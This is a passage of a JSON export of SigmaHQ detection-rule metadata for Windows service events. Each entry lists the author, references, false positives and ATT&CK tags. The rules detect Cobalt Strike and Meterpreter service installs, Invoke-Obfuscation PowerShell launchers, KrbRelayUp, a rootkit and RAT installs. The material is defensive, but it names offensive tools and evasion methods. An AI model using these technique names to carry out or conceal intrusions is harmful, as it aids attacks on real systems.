"uuid": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "value": "Important Windows Service Terminated With Error" }, { "description": "Detects Windows services that got terminated for whatever reason", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-14", "falsepositive": [ "False positives could occur since service termination could happen due to multiple reasons" ], "filename": "win_system_service_terminated_error_generic.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": 
"acfa2210-0d71-4eeb-b477-afab494d596c", "value": "Windows Service Terminated With Error" }, { "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-22", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_pdqdeploy_runner.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", "value": "New PDQDeploy Service - Client Side" }, { "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", "meta": { "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate OpenVPN TAP installation" ], "filename": "win_system_service_install_tap_driver.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "value": "Tap Driver Installation" }, { "description": "Detects Remote Utilities Host service installation on the target system.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-31", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_remote_utilities.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "value": "Remote Utilities Host Service Install" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_var_services.yml", "level": "high", 
"logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "value": "Invoke-Obfuscation VAR+ Launcher - System" }, { "description": "Detects installation or execution of services", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-21", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_hacktools.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_hacktools.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", "value": "HackTool Service Registration or Execution" }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": 
"win_system_invoke_obfuscation_obfuscated_iex_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System" }, { "description": "Detects when the \"Windows Defender Threat Protection\" service is disabled.", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Administrator actions", "Auto updates of Windows Defender causes restarts" ], "filename": "win_system_defender_disabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", "value": "Windows Defender Threat Detection Service Disabled" }, { "description": "Detects Obfuscated 
Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", "value": "Invoke-Obfuscation Via Stdin - System" }, { "description": "Detects important or interesting Windows services that got terminated unexpectedly.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-14", "falsepositive": [ "Rare false positives could occur since service termination could happen due to multiple reasons" ], "filename": "win_system_service_terminated_unexpectedly.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "56abae0c-6212-4b97-adc0-0b559bb950c3", "value": "Important Windows Service Terminated Unexpectedly" }, { "description": "Detects service creation from KrbRelayUp tool used 
for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)", "meta": { "author": "Sittikorn S, Tim Shelton", "creation_date": "2022-05-11", "falsepositive": [ "Unknown" ], "filename": "win_system_krbrelayup_service_installation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/Dec0ne/KrbRelayUp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "value": "KrbRelayUp Service Installation" }, { "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "value": "Invoke-Obfuscation RUNDLL 
LAUNCHER - System" }, { "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement via service creation", "meta": { "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "creation_date": "2021-05-26", "falsepositive": [ "Unknown" ], "filename": "win_system_cobaltstrike_service_installs.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://www.sans.org/webcasts/119395", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.lateral-movement", "attack.t1021.002", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", "value": "CobaltStrike Service Installations - System" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_compress_services.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" }, { "description": "Detects the service installation of various remote access tool (RAT / remote management) software. Such tools are often abused by threat actors to obtain persistent remote access to compromised hosts.", "meta": { "author": "Connor Martin, Nasreddine Bencherchali", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate use of the tool by administrators" ], "filename": "win_system_service_install_remote_access_software.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml" ], "tags": [ "attack.persistence", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a31b18a-f00c-4061-9900-f735b96c99fc", "value": "Remote Access Tool Services Have Been Installed - System" }, { "description": "Detects the installation of RTCore service. 
Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-30", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_rtcore64_service_install.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "value": "RTCore Suspicious Service Installation" }, { "description": "Detects NetSupport Manager service installation on the target system.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-31", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_netsupport_manager.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "value": "NetSupport Manager Service Install" }, { "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-27", "falsepositive": [ "Unlikely" ], "filename": "win_system_service_install_pua_proceshacker.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://twitter.com/1kwpeter/status/1397816101455765504", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "value": "ProcessHacker Privilege Elevation" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_var_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" }, { "description": "Detects service installation in suspicious folder appdata", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-03-18", 
"falsepositive": [ "Unknown" ], "filename": "win_system_susp_service_installation_folder.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", "value": "Service Installation in Suspicious Folder" }, { "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", "meta": { "author": "Tim Rauch (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-15", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_sups_unusal_client.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "value": "Service Installed By Unusual Client - System" }, { "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-05-06", "falsepositive": [ "Unknown" ], "filename": 
"win_system_moriya_rootkit.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_moriya_rootkit.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", "value": "Moriya Rootkit - System" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "value": "Invoke-Obfuscation Via Use MSHTA - System" }, { "description": "Detects a Mesh Agent service installation. 
Mesh Agent is used to remotely manage computers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-28", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_mesh_agent.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", "value": "Mesh Agent Service Installation" }, { "description": "Detects suspicious service installation scripts", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-03-18", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_service_installation_script.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "value": "Suspicious Service Installation Script" }, { "description": "Detects service installation with suspicious folder patterns", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-03-18", 
"falsepositive": [ "Unknown" ], "filename": "win_system_susp_service_installation_folder_pattern.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "value": "Service Installation with Suspicious Folder Pattern" }, { "description": "Detects RemCom service installation and execution events", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-07", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_remcom.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/kavika13/RemCom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remcom.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e36ed87-4986-482e-8e3b-5c23ffff11bf", "value": "RemCom Service Installation" }, { "description": "Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-18", "falsepositive": [ "Unknown" ], "filename": 
"win_system_service_install_uncommon.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_uncommon.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26481afe-db26-4228-b264-25a29fe6efc7", "value": "Uncommon Service Installation Image Path" }, { "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", "meta": { "author": "Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Unlikely" ], "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134.001", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", "value": 
"Meterpreter or Cobalt Strike Getsystem Service Installation - System" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_clip_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher - System" }, { "description": "Detects CSExec service installation and execution events", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-07", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_csexecsvc.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/malcomvetter/CSExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12", 
"value": "CSExec Service Installation" }, { "description": "Detects the installation of the AnyDesk software service, which could be an indication of AnyDesk abuse if the software is not already in legitimate use in the environment.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-11", "falsepositive": [ "Legitimate usage of the anydesk tool" ], "filename": "win_system_service_install_anydesk.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", "value": "Anydesk Remote Access Software Service Installation" }, { "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-28", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_tacticalrmm.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml" ], "tags": [ 